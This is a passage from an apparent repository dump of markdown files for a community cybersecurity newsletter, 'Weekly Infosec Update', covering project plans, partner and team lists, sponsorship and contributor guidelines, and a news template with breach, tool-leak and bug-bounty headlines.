It would be something like Packet Storm, but only with useful information.\n    \n    There will be categories such as:\n     • Daily infosec updates - may contain less important news, but on a daily basis\n     • Weekly infosec updates - general weekly news\n     • Monthly infosec updates - only the most important things that happened during the month\n     • Breach news - big breaches\n     • Critical news - news such as Log4Shell\n     • New TTPs - new tactics, techniques and procedures\n     The list of categories may get bigger.\n\n  2. Public knowledge DB\n    \n    - It would be something between MITRE ATT&CK and an Obsidian notebook. If you ever took notes while learning, you know what I am talking about. It will contain not only techniques, as in MITRE, but also PoCs, an explanation of how each works, and resources for more details. \n    - The knowledge DB will be a wiki, so anyone can contribute their notes or blog posts. Every post will be categorised and linked as in an Obsidian notebook, so by reading one post you will see many more posts related to the same subject. This way we will crowdsource our knowledge and help each other on our infosec journey.\n    \n  3. Offline meetups in cities/countries and support for cybersecurity projects/events.\n  \n  4. We're planning to start Chapters for the ResetHacker Community in different cities and countries, so if you have experience leading a community, group or leaders, do reach out to us at (resethackerofficial@gmail.com). The Chapter name will be, e.g., RH-Country/City/Community/group/Team name.\n  \n  5. 
Collaboration with venues for events.\n\n</details>\n        \n#### Team/Volunteer Opportunities :\n<div align=\"\"><br>\n <a href=\"mailto:resethackerofficail@gmail.com?subject=ResetHacker Community\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n</div>\n\n    If you want to get involved in making **Weekly Cybersecurity Update**, but aren't sure how?\n    CONTACT \"@Attr1b\" on Telegram or contact us through mail \"resethackerofficail@gmail.com\"\n   \n   \n<details>\n<summary><b>Preview</b></summary>\n  \n  - Want to help our community crowdsource knowledge?\n  \n  - How you can contribute with us:\n    \n      - Help us gather infosec news and updates at the end of the week.\n      - Help us develop and/or maintain both of the projects mentioned above.\n      - Suggest something you would want to see and how you plan to improve it. \n    \n - We'll invite volunteers to the GitHub repository as contributors, so later you can add this project to your resume. If you think you can contribute otherwise, or have some other idea that we can help you with, let me know as well.\n</details>\n \n #### 🤝🤝🤝 Researchers, community, groups and community engagement partners that Support Weekly Infosec Update 🤝🤝🤝\n \n<details>\n<summary><b>Preview</b></summary>\n\n- Huge thanks to our awesome [Community Leaders for contributing and giving back to the community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md), and thank you for being part of the team.\n    - Contributors : Good Resources Share, Paul Miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n- I'm very grateful to all the [organizations, groups, and communities that support us with engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). 
Without their support, distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n- Resources from [organizations and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us draft [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md).\n\n</details>\n\n#### Wrapping Up\n\n  Have questions, suggestions, or feedback? Just reply directly by mail; I'd love to hear from you.\n  \n  If you find this update useful and know other people who would too, I'd really appreciate it if you'd forward it to them.\n  Thanks for reading!\n\n\n<p align=\"center\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"RESETHACKER-COMMUNITY\" /> </p>\n"
  },
  {
    "path": "ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md",
    "content": "## [Weekly_Infosec_Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty) Community Engagement partners.\n\nI'm so grateful to all the organizations, groups, and communities that support us with engagement. Without their support, reaching out to hackers would not have been possible.\n\nSupported By | Community, group or organization server/channel description  \n-- | --\n[Hacker101 Discord](https://discord.gg/WrCTm8h) |  This is the official HackerOne Hacker101 Server. If you want to learn to hack legally and earn cash you've come to the right place! \n//[HackTheBox Discord](https://discord.gg/FrRJ3Z8) |  This server was created to bring together people that are passionate about security and hacking. We want to help them learn and further their education while having fun at the same time and meeting people from all around the world. Exchanging ideas, tips and experiences in a respectful way is all we are about. 😉//\n[TryHackMe Discord](https://discord.gg/KsAEejZ) |  This Discord is a dedicated community for the TryHackMe (THM) information security/hacking training website. We are not hackers for hire; requesting such will get you banned immediately.\n[Offensive Security Discord]() |  The Offensive Community Platform was created to allow members to learn, share, and connect with others on the Platform. This Platform allows OffSec Staff to share knowledge and communicate with members.\n[HackerSploit Discord](https://discord.gg/EFpBX3s4Cz) | This Discord server is a hub for professionals, students, and hobbyists interested in learning, sharing, and collaborating. We want to keep it that way. This server promotes learning and the sharing of learning resources in all fields of Infosec and cybersecurity. 
\n[Bug Bounty Hunter Den](https://discord.com/invite/3B86tZa) |  Bug Bounty Hunter Den (BBHD) is a Discord server where bug bounty (BB) hunters (and also BB program organizers) can meet, discuss and share knowledge. It is also the first international Discord server dedicated to bug bounties that is independent of any platform or program. We are trying to build a great bug bounty focused open community.\n[Stefan Rows Community]() | This Discord Server is meant to be a platform to exchange knowledge and help each other out. You can also use this server to reach out to Stefan directly, interact with Stefan's content or discuss any material found on ceos3c.com, Twitch and the YouTube channel. \n[Nahamsec Discord](https://discord.gg/d6dENAq) | This Discord Server is meant to be a platform for bug hunters to collaborate with each other. You can also use this server to reach out to Nahamsec directly, interact with Nahamsec's content or discuss any material found on Nahamsec.com, Twitch and the YouTube channel. \n[RedBlue Private Discussion](t.me/Hide01Bot) | Create a \"Better World\"; you can do it, the RedBlue Team gives you this power!\n[TCM Security Discord](https://discord.gg/b2CrWBcp) | \n[Bounty-hunters](https://discord.com/invite/EGnDD9A) |\n[The Cyber Council](https://discord.gg/NEcNJK4k9u) | The Cyber Council is a server for anyone interested in cybersecurity! Join to talk about CTFs, bug bounties, read news, and anything else that pertains to the field. We are a community of enthusiasts and learners who love meeting new people. Check it out today!\n\n---\n\n[0day.rocks Discord - Admin decided to close the server.]() | \n[HackerAssociation Discord - Still in Talk]  | \n[Huntr - //Still in Talk//](https://discord.com/invite/zXVJPbT) |\n[Threathounds - Still in Talk]() | \n"
  },
  {
    "path": "ResetCybersecuirty/SupportedBy/SponserUs.md",
    "content": "( Note : Currently we're not looking for any sponsorship. Thank you)\n\n# Sponsor & Support\nGrow your brand, generate leads, and fill your funnel.\n---\n### Become A Sponsor\nPLACE YOUR BRAND IN WEEKLY INFOSEC UPDATE\n\n\nAs a *WEEKLY INFOSEC UPDATE sponsor*, you get the opportunity to widen the reach of your brand and products in the community. \nYou will have maximum visibility with your company logo in our *Weekly release InfoSec* Newsletter, shared among the professional community. \nThrough our sponsorship packages, your technology or product will get featured in our WEEKLY INFOSEC UPDATE and our Community Engagement Partners' groups.\n\nBy investing in us, you are investing in the future of solving problems in the Infosec community and supporting researchers' work, innovative ideas and strategies to increase digital awareness. \n\nYour investment in us allows us to have a sustainable development team, add more people for R&D and awareness, and promote cybersecurity culture. \nYour help will also augment your company's image as one that cares about the future of Infosec Security and the community.\n\n---\n\n**WEEKLY INFOSEC UPDATE enables organizations to reach out to professionals in many ways:**\n- Maximize visibility with featured company logo placement in our Weekly release professional Newsletter.\n- Placement of your company logo and website in each news issue of Weekly Infosec Update, which is distributed among Community Engagement Partners' Discord/Telegram/Slack servers.\n- Great opportunities for business expansion, networking, and reaching out to professionals.\n- If your organization would like to be a part of Weekly InfoSec, get noticed among key decision-makers and keep up with the latest in security.\n\n**Newsletter as a Service:**\n- We have a \"Business Oriented Monthly Newsletter\" to secure your cutting-edge technology or product and stay ahead of your competitors.\n- We have options to help you draft your own Newsletter 
to reach your goals and to fit your budget.\n- Kindly contact our Team at **resethackeroffical@gmail.com**\n\n**Stats from WEEKLY INFOSEC UPDATE**\n\n- 1,000+ visits to WEEKLY INFOSEC UPDATE every week.\n- 12+ \"Community Engagement Partners\" to reach out to hackers, including organizations, communities and groups.\n- 7 Community leaders are working side by side to make \"WEEKLY INFOSEC UPDATE\" possible.\n  \n- 3 most popular reasons people visit WEEKLY INFOSEC UPDATE & the ResetHacker community:\n    1. Gain knowledge and stay up to date with InfoSec Security.\n    2. Networking with the community and job opportunities.\n    3. Promote their company, community or their work.\n \n \n \n# SPONSORSHIP CONTACT\n\n    Mr. Vicky Kumar\n    Email: resethackeroffical@gmail.com\n    For General Enquiries: twitter.com/resethacker\n\n\n    \n*RESETHACKER Community* (Not active)\n\n 10 000+    : Instagram\n  1 600+    : Youtube\n  1 000+    : Discord \n  1 200+    : Telegram + Whatsapp Group\n\n\n---\n\nWe started working on the \"Weekly Infosec Update\" open source newsletter because it's very time-consuming to monitor the InfoSec community on Twitter, Telegram, Reddit, Discord and to visit security websites every day.\nWe release \"Weekly Infosec Update\" every Wednesday. \n\nIf I reach my goal of just $1000/month, I will be able to quit my job and do open source and independent security research full time!\n\nPaypal : https://paypal.me/Vicky481\n"
  },
  {
    "path": "ResetCybersecuirty/SupportedBy/Suggestions.md",
    "content": "# Suggestions & Problems:\n\n1. Make it more organized or easy to read.\n2. A TL;DR or small summary of each article would be really impressive.\n3. Add quotes, memes, attractive pictures etc.\n4. Make it shorter and informative. \n5. Suggested names for **Weekly Infosec Update**:\n                      \n                      Infosec CrowdSource,\n                      Infosec Recap or Infosec RECAP,\n                      Infosec Asset,\n                      Infosec Weekly or InfoSec Week..etc   \n                      \n---\nHey, main thing I'd change is the structure itself. You have 6 sections. Why not make it 6 separate .md files? \n\nI honestly don't care about bug bounty or the hiring part. So having to scroll through it is a bit tedious.\nIf there was a main page with links to each section, that'd be much better in my opinion. \n\nMaybe do a very quick introduction to what news is in each section on the main page.\nFor example:\nTWITTER, NEWS & DATA BREACH -> link here\n- Samsung data breach\n- TikTok possible breach\n- ...and more\n\nThen you click on the section and you have all the news from this section in more detail. \n\nAlso THE main thing that should be like NUMBER #1 is new vulnerabilities. \nI'd absolutely love a reliable place I can check every morning to see if there's some new vulnerability that I should be aware of as an engineer. \nNew tools, hiring, research, bug bounty reports...all that is nice to know. \nBut new vulnerabilities are an absolutely critical thing that every engineer working in cybersecurity has to follow. \n\nThat's my 2 cents, good luck with your project guys!\n\n---\n"
  },
  {
    "path": "ResetCybersecuirty/SupportedBy/Team&Contributors.md",
    "content": "## WEEKLY INFOSEC UPDATE : v0.3\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n\nWe started working on [**Weekly Infosec Update**](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Readme.md) because it's very time-consuming for professionals to monitor the InfoSec community on Twitter, Telegram, Reddit, Discord and to visit security websites every day.\n\nWe had no idea we’d end up releasing \"Weekly Infosec Update\" every Wednesday. Huge thanks to our awesome Community Leaders for contributing and giving back to the community, and thank you for being part of the team.\n\n## Leaders and contributors of WEEKLY INFOSEC UPDATE \n| Leader Name | Description | Community/Group | Tags |\n| --- | --- | --- | --- | \n| [Good Resources Share](https://t.me/@Attr1b) | Moderator and contributor of Weekly Infosec Update | ResetHacker |`Infosec`|\n| [Paul Miller] | Community contributor, working closely on crowdsourcing Infosec resources, and contributor of Weekly Infosec Update. | Weekly Infosec Update |`Infosec`|\n| [Turang Parmar] | Security researcher and pentester, giving back to the community at @bugbountytipstech | Bugbountytips.tech |`Bug Bounty`|\n| [Tuhin Bose] | Security researcher and pentester, giving back to the community at @Tuhin1729 | Tuhin1729 |`Bug Bounty`|\n| [Alexandre ZANNI a.k.a noraj] | GitHub Moderator of Weekly Security Update, giving back to the community at @inventory.raw.pm | inventory.raw.pm |`Cybersecurity`|\n| [Vikram] | Founder of ResetHacker | ResetHacker |`Infosec`|\n| [ph03n1x69] | Gives back to the community at @zerodayforums | zerodayforums |`Infosec`|\n| [John Doe] | Red teamer, giving back to the community at @Red-Team Community, and former Administrator of the 0day.rocks Server. | Red-Team Community |`RedTeam`|\n| [h0nus] | Helps security researchers with resources such as Red Team, web app and reverse engineering. 
| Creator of Pwn3rzs group and cyberarsenal forum |`RedTeam`|\n\n- Our community leaders' communities and groups:\n\n- [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) - Our mission is to bring the infosec community, groups and leaders together to solve community challenges and problems, create culture and provide value to the Infosec community.\n\n- [BugBountyTips.Tech]()\n\n- [Tuhin1729 Group]()\n\n- [Red-Team Community Discord]()\n\n- [Zeroday Forums]()\n\n- [Pwn3rzs](https://t.me/Pwn3rzs)\n"
  },
  {
    "path": "ResetCybersecuirty/SupportedBy/Understanding.md",
    "content": "# Understanding community Operation and contributions:\n\nProject: **Weekly Infosec Update**\n\nProblem we're solving?\nWe started working on \"Weekly Infosec Update\" because it's very time-consuming to monitor the InfoSec Community on Twitter, Telegram, Reddit, Slack, Discord, and to visit security websites every day.\n\nGit repository: https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty\n\nTeam & Contributors: https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md\n\n**What type of help I want**: I am looking for collaborators and contributors on this project. We want to add a Developers section.\n\n------------------------------------\nCall for Volunteers at Null community\nDear All,\n\nAs the saying goes, “A Journey of a Thousand Miles Begins with a Single Step”; two years ago we started many new initiatives with null. Some of the initiatives have delivered astonishing results. Below is a list of our small achievements.\n\nWe have published two white-papers on Crypto vulnerabilities  \nhttps://github.com/null-open-security-community/Documentation/tree/master/null-Research-Papers/null-Crypto-Papers\n\nWe have published one white-paper on Cloud vulnerabilities.\nhttps://github.com/null-open-security-community/Documentation/tree/master/null-Research-Papers/Cloud-Security\n\nWe have started null Study Groups and have been able to successfully run 10+ batches in two sprints. 
\nhttps://github.com/null-open-security-community/null-study-groups\n\nWe have re-developed the null jobs website\nhttps://jobs.null.community/\n\nWe have developed 10+ standard operating procedures to conduct various null events. https://github.com/null-open-security-community/Documentation\n\nWe have started null Webinar and virtual meet https://www.youtube.com/c/nullTheOpenSecurityCommunity/videos\n\nWe have started a null Clubhouse. We have 800+ members. We conduct regular weekly/monthly talks on null Clubhouse.\nWe have started a null Telegram channel. We have 250+ members.\nWe have started a null Discord channel. We have 1000+ members in null Discord.\nYou can find links to all our Social Media presence at the link below\nhttps://linktr.ee/nullcommunity\n\nI believe we can achieve many more milestones with the help of extraordinary people like you. To take this effort forward and to reach new heights we are opening a new call for volunteers.\n\nWe hope to get lots of hearts and hands who believe in this cause and are willing to commit some of their precious time.\n----------------------------------------------------------------------------------\nRoles Available\nAspiring Product Manager (2 volunteers) \nSkill Set - Experience and knowledge of product management\nRole - Building a product roadmap for null jobs portal and null.community website/Swachalit platform. Work with Design and Development team to deliver the new product features and enhancements.\n\nGrowth Hacker (2 volunteers) \nSkill Set - Experience and knowledge of Growth hacking skills like Analytics, Digital Marketing, Copywriting, A/B testing.\nRole - Development and execution of Content Strategy and Digital Marketing Strategy to increase the null reach. 
Work with product and marketing team to brainstorm, implement and execute the growth strategy.\n\nUI/UX Designer (2 volunteers) \nSkill Set - Hands-on experience with Figma, Adobe XD, Sketch, or similar software.\nRole - Design new frontend for null.community website and null Swachalit platform.\n\nGraphics Designer (2 Volunteers)\nSkill Set - Hands-on experience with Adobe Creative Cloud or similar software\nRole - Design Banners, Posters for null events. Video editing for null events, null study group website.\n\nFrontEnd Developer (2 volunteers) \nSkill Set - Hands-on experience with Angular or Vue or React\nRole - Develop a new frontend for null jobs portal and null website/Swachalit platform, null Study group.\n\nFullStack/Backend Developer (3 volunteers) \nSkill Set - Hands-on experience with Python + Django\nRole - Feature enhancement and bug fixing of null jobs portal (jobs.null.community)\n\nFullStack Developer (3 volunteers) \nSkill Set - Hands-on experience with Ruby on Rails \nRole - Feature enhancement and bug fixing of null.community website and null Swachalit platform.\n\nDiscord marketing executive (2 volunteers) \nSkill Set - Good understanding and knowledge of collaboration platforms like Discord, Slack, Rocketchat, or similar tools. Cybersecurity domain knowledge would be good.\nRole - Manage and promote null events and activities in the null Discord server and other relevant collaboration platforms. Responsible for Discord user growth and active engagement with null Discord users.\n\nClubhouse marketing executive (2 volunteers) \nSkill Set - Digital Marketing experience and cybersecurity domain knowledge\nRole - Manage the null Clubhouse account. Plan and promote regular weekly/bi-monthly sessions to engage with null Clubhouse users. Work on increasing the null Clubhouse followers.\n\nContent writer/reviewer (2 volunteers) \nSkill Set - Content writing experience in the technology domain\nRole - Developing content strategy. 
Writing content related to null community activities, null success stories, null projects, and new initiatives. Content development for various social media platforms, blogs, and other relevant channels.\n\nTo know more about null volunteer benefits and expectations, please check the document below.\nhttps://github.com/null-open-security-community/Documentation/blob/master/null-Guildeline-documents/null-Volunteer-onboarding-Handbook-2021.pdf\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Contribute.md",
    "content": "## India-centric crowdsourced InfoSec community that makes sense to the World.\n\n## Contribute & Give back to community | Crowdsource your learning with Us.\n##### Too long; didn't read (abbreviated TL;DR and tl;dr) is a shorthand notation added by an editor indicating that a passage appears too long to invest the time to digest it.\n\n- If you’re a professional or a passionate contributor who believes in giving back to the community, you can apply to become a contributor and share a TLDR or 15-55 word summary of writeups, articles, research, whitepapers, stat reports etc.\n\nOur audience:\n\n    InfoSec Business Employees and leaders.\n    Enthusiastic Ethical Hackers.\n    Community Researchers.\n    Blue Team, Red Team & Threat Intelligence. \n    Malware Analysts.\n    Pentesters & Bug Hunters.\n    Chief executive officers (CEOs)\n    Chief financial officers (CFOs)\n    Chief marketing officers (CMOs)\n    Chief technology officers (CTOs)\n    Chief information officers (CIOs)\n\nBefore you write: What we look for\n\n- If you’re serious about contributing and crowdsourcing your learning, please read through the guidelines and expectations in their entirety before submitting a TLDR or ARTICLE summary.\n\nLength: TLDR and article summaries should range in length from 15-55 words, unless previously discussed.\n\n**Topics:**\n\n    Bug bounty articles, tips and resources\n    CVE - PoC, analysis and exploit.\n    Research, Whitepapers, Reports etc\n    InfoSec Business, Technology & STARTUPS,\n    Security Tools, malware, ransomware, RAT, data breaches, leaks etc.\n    Events, Jobs & Higher education (for example, excellent MBA programs, executive MBAs, top business schools, best universities, etc.)\n\nNote on selecting your topic: your selected topic has to fall under one or more of these categories. 
If you’re undecided, you can ask us for a topic/working title.\n\n \n\n    The TLDR or article summary must be unique, original, and exclusive to the INFOSEC WEEKLY UPDATE (i.e. you can’t republish the same TLDR/article/articles).\n    The TLDR or article summary that you provide must not have been submitted, published, republished, or reprinted in other print/online publications.\n    **The TLDR or article summary shouldn’t be too short, say less than 15 words, or too long, say over 55 words.**\n    Content posted today should still be relevant next week.\n    Your TLDR or article summary should be marketing-neutral and written with an intent to add value to our readers.\n    Write in clear, direct and succinct sentences. (i.e. don’t use big words to sound clever!)\n    No defamatory or abusive content will be allowed, no matter how strong or justified your emotions or arguments are.\n    You will be entirely liable for opinion pieces. So please research well for data and information before making claims and conclusions.\n    If placement of links is your goal, then INFOSEC WEEKLY UPDATE is not a good fit for you, and it will save time for everyone if you look elsewhere.\n    Avoid writing in a manner that is intellectually showy or arrogant.\n\nIdeas!\n\n    #### INFOSEC WEEKLY UPDATE (Please check out the Previous Issue.)\n    #### Research, Whitepapers, case studies, Statistics reports, Articles etc. 
\n    #### Trends in infosec, Data Breaches in Infosec, Security concerns etc.\n    #### Security patches and Updates in Companies such as Apple, Android, Google, Facebook, Instagram, Microsoft, Linux, GitHub etc.\n    #### Tips, How-tos or Beginner guides or How I found (You might be surprised to see the kind of things people are Googling.)\n    #### Career Advice, Hiring etc.\n\n\nSubmission of TLDR or article summary.\n\n- You can send the final draft of your article for approval at resethackeroffical@gmail.com or talk to GOOD RESOURCES SHARE to add you to the WIU-RESOURCES group.\n\nThank you,\nEditorial team at the Weekly InfoSec Update.\n\n---\nNote: We do not accept links to leaked databases or illegal/cracked software, but you can cover them in the News format, TLDR format or a summary; still, the final decision regarding the tone and tenor of the TLDR rests with our editorial team. \n\nYou may push boundaries, but we will stick to some limits as set by the laws and our own editorial policies. \nThe Internet is a free space and you will find many other platforms to share unverified links, tools and articles.\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Logs.md",
    "content": "# Log Book \n- 8/12/2022 : Added \"Bug Hunters Segment and Hackerone Reports Segment\" section inside \"Vulnerability/Bug Reports, Writeup Explanations and Analysis\"\n- 8/15/2022 : In talk with : Vx_underground (Status: In Talk), Cyber_detective (Status: Busy), MalwareByte (Status: No), BugbountyTips (Status: Joined), Bugcrowd Unofficial (Status: No response) and Individuals (Status: 2 Members).  \n- 8/16/2022 : Changing the layout of Readme.md file.\n- 8/18/2022 : Community Review (Whatsapp, Telegram & Discord) : Hackerone, Bugcrowd, TCM, bugbounty, RedBlue, etc.\n- 8/23/2022 : Based on the Community review:- Working on a user-friendly and readable format for \"Weekly Infosec Update\".\n- 8/28/2022 : Based on the Community review:- Working on making Weekly Infosec Update user-friendly. (v0.3)\n- 9/02/2022 : Based on the Community review:- Working on making Weekly Infosec Update user-friendly and shorter. (v0.35)\n- 9/11/2022 : Based on the Community review:- Working on making Weekly Infosec Update easy to access by adding a navigation bar & preview. (v0.4)\n- 9/15/2022 : Based on the Community review:- Working on making Weekly Infosec Update easy to access by adding a preview. (v0.45)\n//- 9/*/2022 : Get Featured on Blogs. (Status : Not started Yet)//\n\nTODO LIST :\n- 1. Categorise Weekly Update based on Domain (Eg: Pentesting, SOC, Reverse Engineering, threat hunting etc)\n- 2. Awareness and community Partnership for Weekly Infosec Update. (Eg PortSwigger blog, Bugcrowd blog etc)\nAfter 10th Issue of Weekly Update :\n//- 3. Work on monetizing or getting sponsorship from : Bugcrowd, Intigriti, YesWeHack, HackerOne, TryHackMe etc.\n- 4. Draft mail to approach (Status: Not started Yet) : Bugcrowd(Status:), Hackerone(Status: ), Intigriti(Status: ), BugbountyTips(Status: ) etc. \n- 5. Share Business Model with Weekly Infosec team and how we're going to monetize and provide service.//\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Readme.md",
    "content": "Working On\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_Trail_Beginners.md",
    "content": "## Weekly Infosec Update - Beginners Friendly \n\n<details> \n<summary><b>\n📰📰📰 Community Infused NEWS 📰📰📰  </b></summary>   \n\n <details> \n <summary><b> 1. Twitter Threads & Tips\n </b></summary>   \n \n - 🟢 [LockBit ransomware group pays its first ever $50k bug bounty](https://twitter.com/ido_cohen2/status/1571039567666638848)\n - 🟢 On 12th Sept 2022 [idclickthat](https://twitter.com/idclickthat) tweeted about [Malware @Zoom downloads](https://twitter.com/idclickthat/status/1569350142230204421?t=_7lpBg7U-iokSMCGtSXZSw&s=19). On 19th Sept, Cyble Research and Intelligence Labs (CRIL) released a blog about their investigation of @idclickthat's tweet, and it turned out to be a new campaign: [New Malware Campaign Targets Zoom Users](https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/).\n - 🟢 @SamCurry received [2 crore from Google because of human error.😅](https://twitter.com/samwcyo/status/1569897392560050178?t=TROhjl9xQpcHnG3UOv_uow&s=19)\n - 🟢 [William Wallace](https://twitter.com/phyr3wall/) released his [1st YouTube video on DNS Zone Takeovers](https://www.youtube.com/watch?v=DLNjP9KSgzA&feature=youtu.be)\n</details>  \n \n<details> \n<summary><b>\n2. Data Breach & BlackHat Hackers Leaked\n</b></summary> \n   \n - 🔴 **News - Paid Tools** that have been leaked or cracked by Black Hat Hackers : Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1, Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **News - Black Hat Hacker leaked** : GTA 6 has been leaked over the onion browser, and the Conti source code for v3.7.7 and the Taurus bot source code have been leaked.\n   \n - 🔴 \"UBER GOT HACKED\". 
After a few days Uber officially recognized the data breach and stated that the Lapsus$ group was behind the attack, while the VX-Underground group and individuals such as ColtonSeal and Kevin shared multiple screenshots in which the hacker claimed the breach, mocked Uber's security and described the (unconfirmed) method of breach:\n   - Socially engineered an employee to get on their VPN (could have been prevented with WebAuthn / hardware 2FA)\n   - Once on the VPN, scanned their intranet and found a network share\n   - The network share held PowerShell scripts containing the username and password of an admin user in Thycotic (PAM). Using this, the hacker was able to extract secrets for all services: DA, DUO, OneLogin, AWS, GSuite, domain admin, AWS instances, the HackerOne administration panel, and more.\n   - From there they could get full access to all systems.\n   - When the individual breached Uber, they sent a Slack notification to everyone informing them the company had been breached. Employees thought it was a joke.\n</details> \n \n<details> \n<summary><b>\n3. Top Infosec News\n</b></summary> \n\n - 🟢 **Announcement** : \n   - [Active Directory integration features in Ubuntu 22.04](https://ubuntu.com/engage/New-Active-Directory-integration-features)\n   - Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day vulnerability.\n   - Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks.\n - 🟢 TikTok still denies a security breach of 2 billion users' information after hackers leaked user data and source code. 
\n - 🟢 Rockstar Games confirms that a hacker stole early Grand Theft Auto 6 material, and Uber also confirms that its data was leaked by the Lapsus$ group.\n - 🟢 [Europol and Bitdefender Release Free Decryptor for LockerGoga Ransomware](https://www.nomoreransom.org/uploads/LockerGoga-Decrypt-Doc.pdf)\n - 🟢 [Microsoft Teams stores auth tokens as cleartext in Windows, Linux, Macs](https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/), by BleepingComputer.\n</details> \n \n<details> \n<summary><b>\n4. Event Recap\n</b></summary>\n \nThis week the THREATCON 2022 conference and the Null Delhi meetup registration were trending on Twitter. We have collected publicly available talks, slides, tools, podcasts, videos and upcoming events related to conferences, talks & webinars so you don't miss them and can watch them at a time that suits you.\n\n - **Conferences**\n   - At THREAT CON SEP 2022, Akshay & Bharath shared their talk [Frida Unleashed - Scratching beneath the surface of bug bounties](https://speakerdeck.com/0xbharath/frida-unleashed-scratching-beneath-the-surface-of-bug-bounties)\n\n - **Webinars and videos**\n   - The Null Delhi September Meetup is scheduled for 24 Sep 2022 at the @esecforte office in Gurugram. You can [Register here](https://null.community/events/844-delhi-monthly-meetup)\n   - For Red Teams, this is a really awesome video, but you have to watch it with subtitles: @lsecqt demonstrates a [walkthrough of Sliver C2, a brand new (and still in development) Command and Control Framework](https://www.youtube.com/watch?v=QO_1UMaiWHk). 
It has only a CLI version (for now) and is designed to be extremely easy to install and to work with.\n\n  - **Ongoing/Upcoming 𝙀𝙑𝙀𝙉𝙏𝙎**:\n \n   - MSSP Alert Live : 19th-21st September | Washington DC\n   - CSO50 : 19th-21st September | Washington DC\n   - Fal.Con 2022 : 19th-21st September | Las Vegas\n   - Texas Cyber Summit 2022 : 22nd-24th September | Austin\n   - BSides Singapore Conference 2022 : 22nd-23rd September\n   - InfoSec World 2022 : 26th-28th September | Orlando\n  \n   - 9th Annual Control Systems Cybersecurity : 29th September | UK\n   - BruCON : 29th to 30th September | Mechelen, BE\n   - NetDiligence Cyber Risk Summit : 10th-12th October | Santa Monica\n   - Cyber Security World : 12th to 13th October | Singapore, SG\n   - CISO visions : 17th to 21st October | Virtual – English\n   - Mandiant mWISE Cybersecurity Conference 2022 : 18th-20th October | Washington DC\n   - E-crime & Cybersecurity London : 19th October | London, UK\n   - 7th Annual Counter Insider Threat Symposium : 19th October | Maryland\n   - IT-SA : 25th to 27th October | Nuremberg, DE\n\n</details> \n   \n<details> \n<summary><b>\n5. Hiring/Jobs\n</b></summary>\n \nIn this beginners-friendly segment, we share the latest resources related to jobs this month, interview questions and free training offered by organizations, communities and leaders.\n \n - 1. Take a look at [Internship/Job Openings in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker has collected [Interview Questions asked by organizations](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n</details> \n</details> \n\n\n<details> \n<summary><b> 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞  </b></summary>   \n\n <details> \n <summary><b>1. Hackerone/Bugcrowd reports for Bug Hunters. 
</b></summary>\n \n *1. In this segment, we have filtered out the top **HACKERONE/BUGCROWD REPORTS** for Bug Hunters :*\n   - 🐞$4,000 - [SSRF in Functional Administrative Support Tool pdf generator (████)](https://hackerone.com/reports/1628209) in U.S. Dept Of Defense.\n   - 🐞$2,400 - [Airflow Daemon Mode Insecure Umask Privilege Escalation](https://hackerone.com/reports/1690093) in Apache Airflow prior to 2.3.4.\n   - 🐞$2,000 - [Remote Code Execution on https://███ via improper access control to SCORM Zip upload/import](https://hackerone.com/reports/1122791) in U.S. Dept Of Defense.\n   - 🐞[STORED XSS in █████████/nlc/login.aspx via \"edit\" GET parameter through markdown editor](https://hackerone.com/reports/1631447) in U.S. Dept Of Defense.\n</details> \n \n<details> \n<summary><b>2. Bug bounty writeups, tips & resources. </b></summary>\n \n *2. In this beginners-friendly segment, we collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES***\n   - @Mohsinkhan answered a question for new bug hunters in the article [What would I do if I start bug hunting from 0 again?](https://mokhansec.medium.com/what-would-i-do-if-i-start-bug-hunting-from-0-again-79c7fa78b789)\n   - In this article, @AkashVenky talked about [Network Segmentation 